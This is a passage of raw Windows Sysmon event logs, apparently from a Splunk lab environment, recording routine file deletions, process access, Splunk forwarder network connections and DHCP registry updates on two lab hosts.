Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\glean\db\data.safe.binMD5=70A4D8CBD7C6E2EF49EB0CDD6E8935C4,SHA256=39D635C372A1A3A2F7DC5DA8A13FABDE3CD52E0AA65AF7BA060951CDC03B9FFD,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001052918Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:02:57.713{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\glean\db\data.safe.binMD5=56EC6B9276ABF456CFEA8E0F531E6DDD,SHA256=CAD0FDE86DD21274CE834EB6636426AF6112D8FB0C9CA21266F6800154131F61,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001052917Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:02:57.713{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\glean\db\data.safe.binMD5=FE61B8AA91B6910CA4F7326265B5D872,SHA256=42C19F2C60D665B27E1AB60D781114B57ECE55000A375842A71EEAD142767C10,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001052916Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:02:57.713{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\glean\db\data.safe.binMD5=5256E07F788FF97829C0D7C4A2588593,SHA256=FE02D6BADE22E34DE0E515A363A653EE002942274A86EF55B6367053174CFBF1,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001052915Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:02:57.713{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\glean\db\data.safe.binMD5=C138FA0E19248613F235DD45FAA354BF,SHA256=B0DFC1027517D8973CCC306E66A784952BA45F6695D5CC40C9B2F1818F2F79C0,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001052914Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:02:57.260{466BC892-02BC-60E8-2A00-00000000CF01}2928NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeC:\Program Files\SplunkUniversalForwarder\var\run\serverclass.xmlMD5=DD4D1D185AB4AED8A391DDEB7814ED87,SHA256=CA570F672172721E4189F1D4FCAE899B45A155271730C13B6A88FE6BC47AB312,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001052913Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:02:57.129{466BC892-02AF-60E8-0D00-00000000CF01}900696C:\Windows\system32\svchost.exe{466BC892-02B0-60E8-1600-00000000CF01}1304C:\Windows\System32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+d34e|c:\windows\system32\rpcss.dll+b4d7|c:\windows\system32\rpcss.dll+8257|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x8000000000000000809500Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:02:57.128{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=0BBFB089F7FA3D5EA09BAC4C6149D5C7,SHA256=576192195BB6402DC06C9DDA0B76A8268A3506E6BD7F85616B1C17197A825640,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000809499Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:02:57.128{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=8E5C57C90D1425C1C830B7D59FE1710A,SHA256=602FCA836AF42DDBEE7BCCB97D8C50BB81F96252B9ADE4E42ABC5B13BF4D7DCE,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001052930Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:02:58.893{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=1BEE26BDDAD632A25EBC5C73F145B98E,SHA256=2F1341890964D4DD07EDA8B1453C95F39854F0A1DE74C2B6BB64B0C5E227BD0B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000809502Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:02:58.531{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C6F61F13476D9147472AC0AFC8463ED9,SHA256=B8280950BD86BF924CC1284DEE171D0101440A1C4CDBAE9A0FC18BB9E3953C82,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001052929Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:02:50.777{466BC892-02BC-60E8-2A00-00000000CF01}2928C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-890.attackrange.local51178-false10.0.1.12-8089- 23542300x80000000000000001052928Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:02:58.228{466BC892-5A42-60E8-C510-00000000CF01}7816ATTACKRANGE\bobC:\Windows\System32\WindowsPowerShell\v1.0\powershell_ise.exeC:\Users\bob\AppData\Local\Microsoft_Corporation\powershell_ise.exe_StrongName_lw2v2vm3wmtzzpebq33gybmeoxukb04w\3.0.0.0\AutoSaveInformation\7816.xml~RFf7319bc.TMPMD5=4553D3891EC8198EC956E59A7FA89664,SHA256=7DA31B28073EC76DCCA7EDFC3709014058FE36DCB6626D30538493EE344D57A6,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001052931Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:02:59.911{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=3051B457A696BAADB06521CAC2376690,SHA256=39BE981729E5902B0F46579A3DE2FE512DB9FD23734DE1CFFA0068AE3D83C224,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000809503Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:02:59.533{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=CD74B336AABB18A88B403587D74A3DB3,SHA256=A986B1F00AE5A9660D3F0084F19F6EAB48EDA953D63ECE2A87987F8D4144686D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001052937Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:03:00.912{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=4334917CBCBCB64838C6021077793A4F,SHA256=D02ED2B45F202D76A4A9E44805743C76609E5DB880708F8F8C3BCE359A775F98,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000809504Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:03:00.549{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=39E8E4FCADF727A5FB3E80C22716F154,SHA256=F7F9C8780D4CC69D0FEF424D5711790D92E593C1DF5D3C5DA884C5EB704E2020,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001052936Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:03:00.696{466BC892-3462-60E8-100C-00000000CF01}89449164C:\Program Files\Mozilla Firefox\firefox.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+1c0e5|C:\Windows\System32\windows.storage.dll+1549f7|C:\Windows\System32\windows.storage.dll+154323|C:\Windows\System32\windows.storage.dll+1541a9|C:\Windows\System32\windows.storage.dll+27be5|C:\Windows\System32\windows.storage.dll+27b2d|C:\Windows\System32\windows.storage.dll+26076|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+27a9|C:\Windows\System32\RPCRT4.dll+62d9b|C:\Windows\System32\combase.dll+6520c|C:\Windows\System32\combase.dll+64ec2|C:\Windows\System32\combase.dll+63798|C:\Windows\System32\combase.dll+61c3f|C:\Windows\System32\combase.dll+60c3f|C:\Windows\System32\combase.dll+5e336|C:\Windows\System32\combase.dll+5daea|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c 10341000x80000000000000001052935Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:03:00.696{466BC892-3462-60E8-100C-00000000CF01}89449164C:\Program Files\Mozilla Firefox\firefox.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+1c0e5|C:\Windows\System32\windows.storage.dll+154962|C:\Windows\System32\windows.storage.dll+154323|C:\Windows\System32\windows.storage.dll+1541a9|C:\Windows\System32\windows.storage.dll+27be5|C:\Windows\System32\windows.storage.dll+27b2d|C:\Windows\System32\windows.storage.dll+26076|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+27a9|C:\Windows\System32\RPCRT4.dll+62d9b|C:\Windows\System32\combase.dll+6520c|C:\Windows\System32\combase.dll+64ec2|C:\Windows\System32\combase.dll+63798|C:\Windows\System32\combase.dll+61c3f|C:\Windows\System32\combase.dll+60c3f|C:\Windows\System32\combase.dll+5e336|C:\Windows\System32\combase.dll+5daea|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c 10341000x80000000000000001052934Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:03:00.696{466BC892-3462-60E8-100C-00000000CF01}89449164C:\Program Files\Mozilla Firefox\firefox.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+6482|C:\Windows\System32\shcore.dll+617d|C:\Windows\System32\shcore.dll+5e3d|C:\Windows\System32\shcore.dll+5dcf|C:\Windows\System32\shcore.dll+5cd4|C:\Windows\System32\windows.storage.dll+154947|C:\Windows\System32\windows.storage.dll+154323|C:\Windows\System32\windows.storage.dll+1541a9|C:\Windows\System32\windows.storage.dll+27be5|C:\Windows\System32\windows.storage.dll+27b2d|C:\Windows\System32\windows.storage.dll+26076|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+27a9|C:\Windows\System32\RPCRT4.dll+62d9b|C:\Windows\System32\combase.dll+6520c|C:\Windows\System32\combase.dll+64ec2|C:\Windows\System32\combase.dll+63798|C:\Windows\System32\combase.dll+61c3f|C:\Windows\System32\combase.dll+60c3f 10341000x80000000000000001052933Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:03:00.696{466BC892-3462-60E8-100C-00000000CF01}89449164C:\Program Files\Mozilla Firefox\firefox.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+6154|C:\Windows\System32\shcore.dll+5e3d|C:\Windows\System32\shcore.dll+5dcf|C:\Windows\System32\shcore.dll+5cd4|C:\Windows\System32\windows.storage.dll+154947|C:\Windows\System32\windows.storage.dll+154323|C:\Windows\System32\windows.storage.dll+1541a9|C:\Windows\System32\windows.storage.dll+27be5|C:\Windows\System32\windows.storage.dll+27b2d|C:\Windows\System32\windows.storage.dll+26076|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+27a9|C:\Windows\System32\RPCRT4.dll+62d9b|C:\Windows\System32\combase.dll+6520c|C:\Windows\System32\combase.dll+64ec2|C:\Windows\System32\combase.dll+63798|C:\Windows\System32\combase.dll+61c3f|C:\Windows\System32\combase.dll+60c3f|C:\Windows\System32\combase.dll+5e336 23542300x80000000000000001052932Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:03:00.696{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\6824f4a902c78fbd.customDestinations-ms~RFf732361.TMPMD5=FEEDDF0B48ACBAE2DF2C13E094BA61E1,SHA256=564E4AC53FEF38F8EC2ADC3773CA3AE2E546D9CF626CDED40CA8B8DCCA4D789B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001052938Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:03:01.928{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=FF7743FECF84389C810D00ECFC5E15F5,SHA256=847ED7C9FF277A58F4B306FCCEEFCD55FCDAD066751B33B0F76A039A079E0787,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000809506Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:02:59.369{0C1E0330-0512-60E8-CA00-00000000D001}3600C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-623.attackrange.local57402-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x8000000000000000809505Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:03:01.549{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=311E2E31A0DF5B58D276045BF463EFE7,SHA256=0A8898649FE16B7CC13426F1E5CDD07FCEF32FD8056A86D93A91285A6F298579,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001052941Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:03:02.958{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=51EE5398D4717009F0F960CCBE6B4B4D,SHA256=1EC7F35952A5E1A0AB58808A4B96419725BF1EC8ED2B1726EDB354A56BFC1641,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000809507Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:03:02.549{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=BE4E2BFDAA357AEB931461F295D86A29,SHA256=F31C21C58066E3D2A2A8301F6BA840C1B5FE64DA277C8BA27D2988E35BB3F5D4,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001052940Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:03:02.612{466BC892-02B0-60E8-1600-00000000CF01}13046896C:\Windows\System32\svchost.exe{466BC892-02BC-60E8-3000-00000000CF01}2160C:\Windows\system32\DFSRs.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\wmiprvsd.dll+2a2f2|C:\Windows\system32\wbem\wmiprvsd.dll+29e26|C:\Windows\system32\wbem\wmiprvsd.dll+28432|C:\Windows\system32\wbem\wmiprvsd.dll+57817|C:\Windows\system32\wbem\wmiprvsd.dll+8a475|C:\Windows\system32\wbem\wbemcore.dll+bcb3|C:\Windows\system32\wbem\wbemcore.dll+3393|C:\Windows\system32\wbem\wbemcore.dll+22adf|C:\Windows\system32\wbem\wbemcore.dll+22a19|C:\Windows\system32\wbem\wbemcore.dll+21f5a|C:\Windows\system32\wbem\wbemcore.dll+2c9be|C:\Windows\system32\wbem\wbemcore.dll+202d8|C:\Windows\system32\wbem\wbemcore.dll+390e|C:\Windows\system32\wbem\wbemcore.dll+22bba|C:\Windows\system32\wbem\wbemcore.dll+22a19|C:\Windows\system32\wbem\wbemcore.dll+21f5a|C:\Windows\system32\wbem\wbemcore.dll+22711|C:\Windows\system32\wbem\wbemcore.dll+2d78c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052939Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:03:02.612{466BC892-02B0-60E8-1600-00000000CF01}13046896C:\Windows\System32\svchost.exe{466BC892-02BC-60E8-3000-00000000CF01}2160C:\Windows\system32\DFSRs.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\wmiprvsd.dll+2597b|C:\Windows\system32\wbem\wmiprvsd.dll+283dc|C:\Windows\system32\wbem\wmiprvsd.dll+57817|C:\Windows\system32\wbem\wmiprvsd.dll+8a475|C:\Windows\system32\wbem\wbemcore.dll+bcb3|C:\Windows\system32\wbem\wbemcore.dll+3393|C:\Windows\system32\wbem\wbemcore.dll+22adf|C:\Windows\system32\wbem\wbemcore.dll+22a19|C:\Windows\system32\wbem\wbemcore.dll+21f5a|C:\Windows\system32\wbem\wbemcore.dll+2c9be|C:\Windows\system32\wbem\wbemcore.dll+202d8|C:\Windows\system32\wbem\wbemcore.dll+390e|C:\Windows\system32\wbem\wbemcore.dll+22bba|C:\Windows\system32\wbem\wbemcore.dll+22a19|C:\Windows\system32\wbem\wbemcore.dll+21f5a|C:\Windows\system32\wbem\wbemcore.dll+22711|C:\Windows\system32\wbem\wbemcore.dll+2d78c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x80000000000000001052943Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:03:03.974{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=59DC036CC5A576E5D48A399C26DB2443,SHA256=B1DCC2891E650B230788D4DBF76DA7AFAB1C061E7F0484C30F21757E048514E6,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000809508Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:03:03.565{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=AD16C8966DB23D62426CA0649BF8F15B,SHA256=F13DF95CC14123773E4D73BFCE11C8C6810B2E80BDA6B84AC419F78A71318D17,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001052942Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:02:54.760{466BC892-02C7-60E8-6D00-00000000CF01}3524C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-890.attackrange.local51179-false10.0.1.12-8000- 23542300x8000000000000000809509Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:03:04.580{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D7A9CE8E403033AC7DC64BAD3AC414B5,SHA256=E4068E447EB1CC6FF01BFD4655811410419006931EC71A2B301EA28D4865CFD6,IMPHASH=00000000000000000000000000000000falsetrue 13241300x80000000000000001052957Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-SetValue2021-07-12 08:03:04.973{466BC892-02AF-60E8-1200-00000000CF01}400C:\Windows\System32\svchost.exeHKLM\System\CurrentControlSet\Services\Tcpip\Parameters\Interfaces\{5a71d2ff-5b40-4263-b1f4-8b3588283f4b}\DhcpConnForceBroadcastFlagDWORD (0x00000000) 13241300x80000000000000001052956Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-SetValue2021-07-12 08:03:04.973{466BC892-02AF-60E8-1200-00000000CF01}400C:\Windows\System32\svchost.exeHKLM\System\CurrentControlSet\Services\Tcpip\Parameters\Interfaces\{5a71d2ff-5b40-4263-b1f4-8b3588283f4b}\IsServerNapAwareDWORD (0x00000000) 13241300x80000000000000001052955Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-SetValue2021-07-12 08:03:04.973{466BC892-02AF-60E8-1200-00000000CF01}400C:\Windows\System32\svchost.exeHKLM\System\CurrentControlSet\Services\Tcpip\Parameters\Interfaces\{5a71d2ff-5b40-4263-b1f4-8b3588283f4b}\AddressTypeDWORD (0x00000000) 13241300x80000000000000001052954Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-SetValue2021-07-12 08:03:04.973{466BC892-02AF-60E8-1200-00000000CF01}400C:\Windows\System32\svchost.exeHKLM\System\CurrentControlSet\Services\Tcpip\Parameters\Interfaces\{5a71d2ff-5b40-4263-b1f4-8b3588283f4b}\LeaseTerminatesTimeDWORD (0x60ec0548) 13241300x80000000000000001052953Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-SetValue2021-07-12 08:03:04.973{466BC892-02AF-60E8-1200-00000000CF01}400C:\Windows\System32\svchost.exeHKLM\System\CurrentControlSet\Services\Tcpip\Parameters\Interfaces\{5a71d2ff-5b40-4263-b1f4-8b3588283f4b}\T2DWORD (0x60ec0386) 13241300x80000000000000001052952Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-SetValue2021-07-12 08:03:04.973{466BC892-02AF-60E8-1200-00000000CF01}400C:\Windows\System32\svchost.exeHKLM\System\CurrentControlSet\Services\Tcpip\Parameters\Interfaces\{5a71d2ff-5b40-4263-b1f4-8b3588283f4b}\T1DWORD (0x60ebfe40) 13241300x80000000000000001052951Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-SetValue2021-07-12 08:03:04.973{466BC892-02AF-60E8-1200-00000000CF01}400C:\Windows\System32\svchost.exeHKLM\System\CurrentControlSet\Services\Tcpip\Parameters\Interfaces\{5a71d2ff-5b40-4263-b1f4-8b3588283f4b}\LeaseObtainedTimeDWORD (0x60ebf738) 13241300x80000000000000001052950Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-SetValue2021-07-12 08:03:04.973{466BC892-02AF-60E8-1200-00000000CF01}400C:\Windows\System32\svchost.exeHKLM\System\CurrentControlSet\Services\Tcpip\Parameters\Interfaces\{5a71d2ff-5b40-4263-b1f4-8b3588283f4b}\LeaseDWORD (0x00000e10) 13241300x80000000000000001052949Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-SetValue2021-07-12 08:03:04.973{466BC892-02AF-60E8-1200-00000000CF01}400C:\Windows\System32\svchost.exeHKLM\System\CurrentControlSet\Services\Tcpip\Parameters\Interfaces\{5a71d2ff-5b40-4263-b1f4-8b3588283f4b}\DhcpServer10.0.1.1 13241300x80000000000000001052948Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-SetValue2021-07-12 08:03:04.973{466BC892-02AF-60E8-1200-00000000CF01}400C:\Windows\System32\svchost.exeHKLM\System\CurrentControlSet\Services\Tcpip\Parameters\Interfaces\{5a71d2ff-5b40-4263-b1f4-8b3588283f4b}\DhcpSubnetMask255.255.255.0 13241300x80000000000000001052947Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-SetValue2021-07-12 08:03:04.973{466BC892-02AF-60E8-1200-00000000CF01}400C:\Windows\System32\svchost.exeHKLM\System\CurrentControlSet\Services\Tcpip\Parameters\Interfaces\{5a71d2ff-5b40-4263-b1f4-8b3588283f4b}\DhcpIPAddress10.0.1.14 13241300x80000000000000001052946Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-SetValue2021-07-12 08:03:04.973{466BC892-02AF-60E8-1200-00000000CF01}400C:\Windows\System32\svchost.exeHKLM\System\CurrentControlSet\Services\Tcpip\Parameters\Interfaces\{5a71d2ff-5b40-4263-b1f4-8b3588283f4b}\DhcpInterfaceOptionsBinary Data 23542300x80000000000000001052945Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:03:04.511{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=A69829D4D654E1740F781E0E95F3E002,SHA256=A125B61CF869E96A455EB8A4D1AF0B98463806A3FA9D36BEB54170448E281893,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001052944Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:03:04.511{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=7E9BB51D9B1435F83D2C6BD739783CAB,SHA256=C85DA7AEDA1A8A0C59FE700192C8EB49EBDF2462B53A599246BDDD18278263D9,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000809510Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:03:05.580{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program 